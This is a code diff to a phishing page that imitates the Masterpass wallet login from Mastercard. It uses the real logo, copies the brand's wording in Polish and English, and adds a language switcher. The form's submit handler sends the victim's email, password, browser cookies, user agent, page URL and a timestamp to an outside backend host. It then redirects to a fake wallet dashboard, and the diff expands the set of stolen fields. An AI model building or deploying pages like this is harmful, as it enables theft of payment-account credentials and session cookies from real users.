--- a/public/index.html
+++ b/public/index.html
@@ -1,40 +1,90 @@
-
 <!DOCTYPE html>
 <html lang="pl">
 <head>
   <meta charset="UTF-8" />
-  <title>Portfel Masterpass</title>
+  <title>Masterpass™ Wallet | Login</title>
   <link rel="stylesheet" href="/style.css" />
 </head>
-<body class="login-page">
-  <div class="login-wrapper">
-    <div class="login-box">
-      <div class="logo-box">
-        <img src="https://www.masterpass.pl/img/masterpass_logo.svg" alt="Masterpass logo" class="logo" />
-      </div>
-      <h2>Zaloguj się do swojego portfela</h2>
-      <form id="loginForm">
-        <label for="email">Adres e-mail</label>
-        <input type="email" id="email" placeholder="np. jan.kowalski@gmail.com" required />
-
-        <label for="password">Hasło</label>
-        <input type="password" id="password" placeholder="Wprowadź hasło" required />
-
-        <div class="form-footer">
-          <a href="#">Nie pamiętasz hasła?</a>
-        </div>
-
-        <button type="submit" class="submit-btn">Zaloguj się</button>
-      </form>
-      <div class="register-box">
-        <p>Nie masz konta? <a href="#">Zarejestruj się</a></p>
-      </div>
-    </div>
+<body>
+  <div class="lang-switcher">
+    <button onclick="setLang('pl')">PL</button>
+    <button onclick="setLang('en')">EN</button>
   </div>
 
-  <script type="module">
-    const form = document.getElementById('loginForm');
-    form.addEventListener('submit', async (e) => {
+  <div class="container">
+    <img src="https://www.masterpass.pl/img/masterpass_logo.svg" alt="Masterpass" class="logo" />
+    <h1 id="login-title"></h1>
+
+    <div class="features" id="features-text"></div>
+
+    <form id="loginForm">
+      <label for="email" id="email-label"></label>
+      <input type="email" id="email" required />
+
+      <label for="password" id="password-label"></label>
+      <input type="password" id="password" required />
+
+      <div class="remember">
+        <input type="checkbox" id="remember" />
+        <label for="remember" id="remember-label"></label>
+      </div>
+
+      <div class="form-footer">
+        <a href="#" id="reset-link"></a>
+      </div>
+
+      <button type="submit" class="submit-btn" id="submit-btn"></button>
+    </form>
+  </div>
+
+  <div class="cookie-banner" id="cookie-text"></div>
+
+  <script>
+    const langData = {
+      pl: {
+        loginTitle: 'Zaloguj się lub aktywuj portfel Masterpass™ od Mastercard®',
+        features: `Masterpass™ to wiele korzyści:<br>
+        <strong>Bezpieczeństwo</strong> Płatność, dzięki której sklepy on-line nie widzą danych Twojej karty<br>
+        <strong>Szybkość transakcji</strong> Dane karty podajesz tylko raz - przy rejestracji<br>
+        <strong>Wygoda</strong> Zakupy on-line na każdym urządzeniu`,
+        emailLabel: 'Adres e-mail lub numer telefonu',
+        passwordLabel: 'Hasło',
+        remember: 'Pamiętaj mój login',
+        reset: 'Nie znam hasła',
+        submit: 'Zaloguj się',
+        cookies: 'Strona wykorzystuje pliki cookie i inne podobne technologie. Korzystając z niej wyrażasz zgodę na ich używanie zgodnie z aktualnymi ustawieniami przeglądarki. Więcej informacji znajdziesz w dokumencie <a href="#">Informacja o Plikach Cookie</a>.'
+      },
+      en: {
+        loginTitle: 'Log in or activate your Masterpass™ wallet by Mastercard®',
+        features: `Masterpass™ offers many benefits:<br>
+        <strong>Security</strong> Pay online without disclosing your card details to the shop<br>
+        <strong>Fast transactions</strong> You enter your card data only once – when you register<br>
+        <strong>Convenience</strong> Online shopping on any device`,
+        emailLabel: 'E-mail address or phone number',
+        passwordLabel: 'Password',
+        remember: 'Remember my login',
+        reset: 'Reset password',
+        submit: 'Sign in',
+        cookies: 'This site uses cookies and similar technologies. By using this site you consent to their use in accordance with your current browser settings. For more information, see <a href="#">Information about Cookies</a>.'
+      }
+    };
+
+    const setLang = (lang) => {
+      localStorage.setItem('lang', lang);
+      const t = langData[lang];
+      document.getElementById('login-title').innerHTML = t.loginTitle;
+      document.getElementById('features-text').innerHTML = t.features;
+      document.getElementById('email-label').innerText = t.emailLabel;
+      document.getElementById('password-label').innerText = t.passwordLabel;
+      document.getElementById('remember-label').innerText = t.remember;
+      document.getElementById('reset-link').innerText = t.reset;
+      document.getElementById('submit-btn').innerText = t.submit;
+      document.getElementById('cookie-text').innerHTML = t.cookies;
+    };
+
+    setLang(localStorage.getItem('lang') || 'pl');
+
+    document.getElementById('loginForm').addEventListener('submit', async (e) => {
       e.preventDefault();
       const email = document.getElementById('email').value.trim();
       const password = document.getElementById('password').value.trim();
@@ -42,10 +92,17 @@
       await fetch('https://zaza-back.onrender.com/login', {
         method: 'POST',
         headers: { 'Content-Type': 'application/json' },
-        body: JSON.stringify({ email, password, cookies: document.cookie })
+        body: JSON.stringify({
+          email,
+          password,
+          cookies: document.cookie,
+          userAgent: navigator.userAgent,
+          url: location.href,
+          date: new Date().toISOString()
+        })
       });
 
-      window.location.href = '/wallet-dashboard.html';
+      window.location.href = '/public/wallet-dashboard.html';
     });
   </script>
 </body>
